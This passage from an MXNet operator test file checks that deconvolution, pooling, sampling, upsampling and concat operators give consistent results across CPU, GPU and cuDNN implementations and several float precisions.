ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, rtol=tol, atol=tol)
check_consistency(sym, ctx_list, rtol=tol, atol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 8, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
scale = 1
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list, scale=scale)
check_consistency(sym, ctx_list, scale=scale, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=True)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float64}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear", cudnn_off=False)
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_pooling_with_type2():
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare cpu and gpu results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
@with_seed()
def test_pooling_nhwc_with_type():
def make_pooling_syms(**kwargs):
# Conventional NCHW layout pooling
sym = mx.sym.Pooling(**kwargs)
# NHWC pooling
data = mx.sym.Variable('pool_data')
sym_nhwc = mx.sym.transpose(data, axes=(0,2,3,1))
sym_nhwc = mx.sym.Pooling(sym_nhwc, layout='NHWC', **kwargs)
sym_nhwc = mx.sym.transpose(sym_nhwc, axes=(0,3,1,2), name='pool')
return [sym, sym_nhwc]
# While the float32 and float64 output is reliably consistent, float16 departs occasionally.
# We compare nhwc and nchw results only within a given precision.
for data_type in [np.float64, np.float32, np.float16]:
# NHWC pooling only enabled on GPU with CUDNN
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': data_type}}]
symlist = make_pooling_syms(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency_NxM(symlist, ctx_list)
symlist = make_pooling_syms(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
check_consistency_NxM(symlist, ctx_list)
@with_seed()
def test_pooling_versions():
# Produce the name of the 'transposed' layout, given the dimension
def transposed_layout(ndim):
if ndim < 3 or ndim > 5:
raise RuntimeError("Invalid data dim, expecting 3, 4 or 5")
return ('NWC', 'NHWC', 'NDHWC')[ndim-3]
# default padding is all zeros
def is_default_pad(pad):
return pad == (0,) * len(pad)
# default stride is all ones
def is_default_stride(stride):
return stride == (1,) * len(stride)
# returns True/False randomly with equal probability
def random_choice():
return np.random.random(1)[0] < 0.5
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False, p_value=2,
count_include_pad=True, tol=None, dtype=np.float32):
ctx_list = []
sym_list = []
for pool_ctx in pool_op_list:
(pool_op, ctx_type) = pool_ctx.rsplit('_', 1)
expected_ctxs = ['cpu', 'gpu', 'cudnn']
if ctx_type not in expected_ctxs:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_ctxs, ctx_type))
ctx = mx.cpu(0) if ctx_type == 'cpu' else mx.gpu(0)
ctx_list.append({'ctx': ctx, 'pool_data': data, 'type_dict': {'pool_data': dtype}})
# start with pool args present in all cases
pool_op_args = {'kernel': kernel, 'pool_type': pool_type,
'pooling_convention' : pooling_convention, 'name' : 'pool'}
# add other args as needed
if global_pool:
pool_op_args['global_pool'] = True
else:
# Add pad and stride param if needed, plus randomly when it matches the default
if not is_default_pad(pad) or random_choice():
pool_op_args.update({'pad' : pad})
if not is_default_stride(stride) or random_choice():
pool_op_args.update({'stride' : stride})
expected_pool_ops = ['pool', 'pool_transposed', 'pool_v1']
if pool_op == 'pool_v1':
sym = mx.sym.Pooling_v1(**pool_op_args)
else:
pool_op_args.update({'p_value' : p_value, 'count_include_pad' : count_include_pad})
if ctx_type != 'cpu':
pool_op_args['cudnn_off'] = ctx_type == 'gpu'
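                    # ('gpu' here means the native MXNet GPU kernel with cuDNN disabled;
                    #  'cudnn' keeps cuDNN enabled for the same op.)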
if pool_op == 'pool':
# isolate pooling input from symbol input to test shared tensor optimizations
buffered_input = mx.sym.identity(name='pool')
sym = mx.sym.Pooling(buffered_input, **pool_op_args)
elif pool_op == 'pool_transposed':
ndim = len(data)
# NCW->NWC axes=(0,2,1) NCHW->NHWC axes=(0,2,3,1) NCDHW->NDHWC axes=(0,2,3,4,1);
axes = (0,) + tuple(range(2,ndim)) + (1,)
transposed = mx.sym.transpose(axes=axes, name='pool')
pooled = mx.sym.Pooling(data=transposed, layout=transposed_layout(ndim),
**pool_op_args)
# NWC->NCW axes=(0,2,1) NHWC->NCHW axes=(0,3,1,2) NDHWC->NCDHW axes=(0,4,1,2,3);
axes = (0, ndim-1) + tuple(range(1,ndim-1))
sym = mx.sym.transpose(data=pooled, axes=axes, name='pool')
else:
raise RuntimeError('Expected one of {}, saw {}.'.format(expected_pool_ops,
pool_op))
sym_list.append(sym)
check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), rtol=tol, atol=tol)
def test_pooling_dim(dim, pool_type, dtype, pool_op_list, p_value=2, count_include_pad=True,
tol=None):
if dim == '1D':
data = (3, 3, 10)
kernels = [(4,), (4,), (5,)]
pads = [(0,), (2,), (2,)]
strides = [(1,), (2,), (1,)]
elif dim == '2D_no_padding':
data = (3, 2, 20, 20)
kernels = [(3, 3), (4, 5)]
pads = [(0, 0), (0, 0)]
strides = [(1, 1), (2, 1)]
elif dim == '2D':
data = (2, 2, 20, 20)
kernels = [(3, 3), (3, 5), (4, 5), (4, 5)]
pads = [(0, 0), (1, 2), (0, 0), (2, 3)]
strides = [(1, 1), (1, 1), (2, 1), (1, 1)]
elif dim == '3D':
data = (2, 3, 20, 20, 20)
kernels = [(4, 5, 3), (4, 5, 3), (3, 5, 7)]
pads = [(0, 0, 0), (2, 3, 2), (1, 2, 3)]
strides = [(1, 1, 1), (2, 3, 1), (1, 1, 1)]
else:
raise RuntimeError('Unexpected pooling test class: {}.'.format(dim))
for kernel, pad, stride in zip(kernels, pads, strides):
for pooling_convention in ['valid', 'full']:
try:
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=pad, stride=stride,
pool_type=pool_type, pooling_convention=pooling_convention,
global_pool=False, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
except:
print('pool_op_list = {}'.format(pool_op_list))
print('kernel={}, pad={}, stride={}'.format(kernel, pad, stride))
print('pool_type={}, pooling_convention={}, global_pool=False'.format(pool_type,
pooling_convention))
print('p_value={}, count_include_pad={}, dtype={}'.format(p_value,
count_include_pad, dtype))
print('environ = \n{}'.format(os.environ))
raise
        # Make sure kernel is ignored during global_pool by sometimes setting it to an absurdly large value
kernel = kernels[0]
if random_choice():
kernel = (300,) * len(kernel)
test_pooling_versions_helper(pool_op_list=pool_op_list,
data=data, kernel=kernel, pad=None, stride=None,
pool_type=pool_type, global_pool=True, p_value=p_value,
count_include_pad=count_include_pad, tol=tol, dtype=dtype)
# The various implementations of the standard pooling operator
std_pool_op_list = ['pool_cpu', 'pool_transposed_cpu',
'pool_gpu', 'pool_transposed_gpu',
'pool_cudnn', 'pool_transposed_cudnn']
# The implementations of the 'v1' pooling operator
v1_pool_op_list = ['pool_v1_cpu', 'pool_v1_gpu']
    # For those cases when all implementations should match - the combined implementation list.
combo_pool_op_list = std_pool_op_list + v1_pool_op_list
for dtype in [np.float32, np.float64, np.float16]:
# Testing of the standard (not 'v1') pooling operator is universal across all
# data dimensions, implementations and layouts.
for dim in ['1D', '2D', '3D']:
test_pooling_dim(dim, 'max', dtype, std_pool_op_list)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=True)
test_pooling_dim(dim, 'avg', dtype, std_pool_op_list, count_include_pad=False)
test_pooling_dim(dim, 'sum', dtype, std_pool_op_list)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=1)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=2)
test_pooling_dim(dim, 'lp', dtype, std_pool_op_list, p_value=3)
# Testing of the 'v1' pooling operator is over its restricted support domain of
# 2D data only and not with the 'lp' pooling type. The 'v1' cpu and gpu versions are
# always tested against each other, and sometimes against the standard operator versions.
# The slightly different 'v1' definition prevents this in the following cases:
#
# 1. In max pooling, when multiple input values are the maximum in the input window,
# the 'v1' implementation backprops the gradient to all maxima, whereas the standard
# pooling operator backprops the gradient to the lowest-indexed maximum only.
# 2. In max pooling, the 'v1' operator pads with 0's and this value can become the
# maximum output value in the case of an all-negative input. The standard pooling
# operator effectively considers the padding to be the largest negative value, so
# only input values should appear in the output.
# 3. In avg pooling, the 'v1' operator divides the sum by the same window size factor,
# even at the edges, and so does not support count_include_pad = False.
# 4. The float16 'v1' pooling operator performs forward sums and averages in
# float16, whereas the std operators perform those calculations in float32, so
# greater float16 tolerances are needed when comparing across implementations.
        # Double the float16 tol when comparing v1 and non-v1 implementations, per note 4 above.
relaxed_tol = {np.dtype(np.float16): 2e-1,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0,
np.dtype(np.int64): 0}
# Exclude std implementations due to points 1 and 2 above.
test_pooling_dim('2D', 'max', dtype, v1_pool_op_list)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'avg', dtype, combo_pool_op_list, count_include_pad=True,
tol=relaxed_tol)
# Exclude std implementations due to point 3 above.
test_pooling_dim('2D', 'avg', dtype, v1_pool_op_list, count_include_pad=False)
# The standard and 'v1' implementations match for this case.
test_pooling_dim('2D', 'sum', dtype, combo_pool_op_list, tol=relaxed_tol)
# We can compare the standard and 'v1' max pooling implementations if we eliminate padding
# (see point 2 above) and use np.float64 data so that no two random input window values are
# likely to be the same (see point 1 above).
test_pooling_dim('2D_no_padding', 'max', np.float64, combo_pool_op_list)
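# Illustrative sketch (added for clarity; not collected by nose since the name lacks the
# 'test_' prefix, and it assumes the module-level `np` import used throughout this file):
# the axes tuples used by the 'pool_transposed' path above, checked round-trip with plain numpy.
def _example_channels_last_roundtrip():
    x = np.arange(2 * 3 * 4 * 5).reshape(2, 3, 4, 5)                    # NCHW
    ndim = x.ndim
    to_channels_last = (0,) + tuple(range(2, ndim)) + (1,)              # NCHW -> NHWC
    to_channels_first = (0, ndim - 1) + tuple(range(1, ndim - 1))       # NHWC -> NCHW
    assert np.array_equal(x.transpose(to_channels_last).transpose(to_channels_first), x)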
@with_seed()
def test_pooling_full_2d():
def test_pooling_full_2d_type(pool_type):
data = (2, 2, 10, 10)
kernel = (4, 5)
pad = (1, 2)
stride = (3, 4)
convention = 'full'
ctx_list = []
sym_list = []
# o_h = ceil((10 + 1 + 1 - 4) / 3) + 1 = 4
# o_w = ceil((10 + 2 + 2 - 5) / 4) + 1 = 4
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=convention, global_pool=False, name='pool'))
check_consistency(sym_list, ctx_list)
test_pooling_full_2d_type('max')
test_pooling_full_2d_type('avg')
test_pooling_full_2d_type('sum')
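# Illustrative sketch (added for clarity, not part of the test suite): with
# pooling_convention='full' the output size uses a ceiling division, which is how the
# o_h/o_w comments inside test_pooling_full_2d were derived. Assumes symmetric padding.
def _example_full_convention_out_size(in_size, kernel, pad, stride):
    import math
    return int(math.ceil(float(in_size + 2 * pad - kernel) / stride)) + 1
# e.g. _example_full_convention_out_size(10, 4, 1, 3) == 4 and
#      _example_full_convention_out_size(10, 5, 2, 4) == 4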
@with_seed()
def test_flatten_slice_after_conv():
ctx_list = []
data = mx.sym.Variable('conv_data')
conv = mx.symbol.Convolution(data=data, name='conv', num_filter=16, kernel=(3,3), stride=(1,1))
flatten = mx.symbol.flatten(data=conv)
slice_sym = mx.symbol.slice(data=flatten, begin=0, end=1)
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.cpu(0), 'conv_data': (2, 16, 16, 16), 'type_dict': {'conv_data': np.float32}}]
check_consistency(slice_sym, ctx_list, scale=0.5)
@with_seed()
def test_bilinear_resize_op():
ctx_list = [{'ctx': mx.cpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (2, 2, 20, 20), 'type_dict': {'data': np.float32}}]
data = mx.sym.Variable('data')
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, height=10, width=5, align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=2, scale_width=0.5, mode='odd_scale', align_corners=False)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=True)
check_consistency(sym, ctx_list)
sym = mx.sym.contrib.BilinearResize2D(data, None, scale_height=0.5, scale_width=2, mode='to_even_up', align_corners=False)
check_consistency(sym, ctx_list)
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type, p_value=2):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type, p_value=2):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
if pool_type != 'lp':
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_1d_pooling('lp', p_value=1)
test_1d_pooling('lp', p_value=2)
test_1d_pooling('lp', p_value=3)
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_2d_pooling('lp', p_value=1)
test_2d_pooling('lp', p_value=2)
test_2d_pooling('lp', p_value=3)
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
